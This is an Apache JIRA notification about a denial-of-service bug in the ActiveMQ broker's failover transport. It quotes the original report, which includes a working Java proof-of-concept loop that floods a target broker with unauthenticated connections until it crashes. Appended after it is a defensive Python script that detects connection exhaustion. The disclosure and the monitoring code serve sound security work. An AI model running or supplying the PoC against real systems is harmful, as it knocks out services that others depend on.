Date: Wed, 31 Aug 2011 17:48:10 +0000 (UTC)
From: "Luca Carettoni (JIRA)"
To: dev@activemq.apache.org
Subject: [jira] [Commented] (AMQ-3294) ActiveMQ failover Denial of Service

    [ https://issues.apache.org/jira/browse/AMQ-3294?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=13094720#comment-13094720 ]

Luca Carettoni commented on AMQ-3294:
-------------------------------------

Gary, thanks for your follow-up!

I haven't tested it yet, but it does indeed look like a possible workaround, at least to avoid a brutal crash.

I've just downloaded the latest stable (5.5.0) and it does not include this configuration option in any of the configuration templates. From the security standpoint, it would be great to see this transport option enabled by default with a reasonable value.

> ActiveMQ failover Denial of Service
> -----------------------------------
>
>                 Key: AMQ-3294
>                 URL: https://issues.apache.org/jira/browse/AMQ-3294
>             Project: ActiveMQ
>          Issue Type: Bug
>          Components: Broker
>    Affects Versions: 5.2.0, 5.5.0
>         Environment: Linux ubuntu 2.6.32-30-generic and other Linux versions
>            Reporter: Luca Carettoni
>              Labels: security
>
> Abusing the 'failover' feature in ActiveMQ, an unauthenticated user can trigger a Denial of Service condition against the broker service.
> In detail, an attacker can issue multiple ActiveMQ openwire connection requests using the following connection string: failover:tcp://:61616
> Due to the 'failure' mechanism, all TCP connections remain active even if a valid session is not created.
> Please note that no valid credentials have been used.
> After a few thousand requests, a "java.net.SocketException: Too many open files" exception is triggered, causing the freeze/crash of the broker. Connected systems may crash as well.
> During my test, the attack took around 4 minutes (in a local network) and it is highly reliable. This is most likely an abuse of the 'failover' functionality.
> I've been testing version 5.2.0 and also the latest 5.5.0 release. As both releases are affected, I assume that this issue is present in other versions as well. The problem appears in the default configuration as well as with different authentication plugins enabled.
>
> Proof-Of-Concept:
> --------------------
> package openwireclient;
>
> import javax.jms.*;
> import org.apache.activemq.ActiveMQConnectionFactory;
>
> public class GoAndCrash {
>
>     private static String url = "failover:tcp://";
>
>     public static void main(String[] args) throws JMSException {
>         System.out.println("\n--[ ActiveMQ Denial of Service PoC ]\n");
>         url = url.concat(args[0] + ":" + args[1]);
>         int cont = 0;
>         while (true) {
>             try {
>                 System.out.println("[*] Request #" + cont);
>                 ConnectionFactory connectionFactory = new ActiveMQConnectionFactory("invalidUser", "invalidPass", url);
>                 Connection connection = connectionFactory.createConnection();
>                 cont++;
>                 connection.start();
>             } catch (Exception ex) {
>                 //do nothing
>             }
>         }
>     }
> }
> --------------------

--
This message is automatically generated by JIRA.
For more information on JIRA, see: http://www.atlassian.com/software/jira
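An added, defender-side example that is not part of the JIRA thread or of ActiveMQ itself: a small Python script an operator could run beside the broker to notice the failure mode the report describes (many unauthenticated connections from one peer accumulating until the process runs out of file descriptors). It parses `ss -tn`-style output, counts established connections to the OpenWire port per peer address, flags peers above a threshold, and checks file-descriptor headroom before the "Too many open files" exception fires. The `ss` column layout, the 10.0.0.x addresses, the thresholds and the fd figures are all constructed for this example; the script does not depend on whichever broker-side transport option the comment above refers to, which the comment does not name.

```python
"""Defender-side check for connection exhaustion against an ActiveMQ broker.

Parses `ss -tn`-style output, counts established connections to the
broker's OpenWire port per peer address, flags peers above a threshold,
and reports file-descriptor headroom so the "Too many open files"
condition can be caught before the broker wedges.

Assumptions (not from the JIRA thread): the ss column layout below, the
10.0.0.x addresses, and the thresholds are constructed for this example.
"""
from collections import Counter

BROKER_PORT = 61616  # default OpenWire port, as in the report

# Constructed sample of `ss -tn` output; not a real capture.
SAMPLE_SS_OUTPUT = """\
State      Recv-Q Send-Q Local Address:Port   Peer Address:Port
ESTAB      0      0      10.0.0.5:61616       10.0.0.77:40001
ESTAB      0      0      10.0.0.5:61616       10.0.0.77:40002
ESTAB      0      0      10.0.0.5:61616       10.0.0.77:40003
ESTAB      0      0      10.0.0.5:61616       10.0.0.77:40004
ESTAB      0      0      10.0.0.5:61616       10.0.0.8:51234
ESTAB      0      0      10.0.0.5:8161        10.0.0.8:51240
TIME-WAIT  0      0      10.0.0.5:61616       10.0.0.9:33333
"""


def parse_connections(ss_text, local_port=BROKER_PORT):
    """Return (peer_ip, peer_port) pairs for ESTAB sockets on local_port.

    Only established sockets count: they are the ones that hold a file
    descriptor inside the broker process.
    """
    peers = []
    for line in ss_text.splitlines():
        parts = line.split()
        if len(parts) < 5 or parts[0] != "ESTAB":
            continue  # header line, listeners, TIME-WAIT, etc.
        local, peer = parts[3], parts[4]
        _, lport = local.rsplit(":", 1)  # rsplit keeps IPv6 literals intact
        pip, pport = peer.rsplit(":", 1)
        if int(lport) == local_port:
            peers.append((pip, int(pport)))
    return peers


def connections_per_peer(peers):
    """Count established broker connections per peer IP."""
    return Counter(ip for ip, _ in peers)


def flag_peers(counts, threshold):
    """Peers holding at least `threshold` concurrent connections, sorted."""
    return sorted(ip for ip, n in counts.items() if n >= threshold)


def fd_at_risk(open_fds, fd_limit, min_free_fraction=0.2):
    """True when less than min_free_fraction of the process fd limit is free.

    In practice open_fds comes from `ls /proc/<pid>/fd | wc -l` and fd_limit
    from `ulimit -n` of the broker's user; both are assumed values here.
    """
    if fd_limit <= 0:
        raise ValueError("fd_limit must be positive")
    return (fd_limit - open_fds) / fd_limit < min_free_fraction


def report(ss_text, threshold=3, open_fds=None, fd_limit=1024):
    """Summarise one snapshot; open_fds defaults to the established count."""
    peers = parse_connections(ss_text)
    counts = connections_per_peer(peers)
    if open_fds is None:
        open_fds = len(peers)
    return {
        "established": len(peers),
        "per_peer": dict(counts),
        "flagged": flag_peers(counts, threshold),
        "fd_at_risk": fd_at_risk(open_fds, fd_limit),
    }


if __name__ == "__main__":
    for key, value in report(SAMPLE_SS_OUTPUT).items():
        print(f"{key}: {value}")
```

On the constructed sample the script flags 10.0.0.77 (four concurrent OpenWire connections against a threshold of three) and reports the fd headroom as healthy; feeding it a live `ss -tn` snapshot at a short interval, with the threshold set from the normal per-client connection count of the deployment, gives an early signal well before the broker hits its descriptor limit.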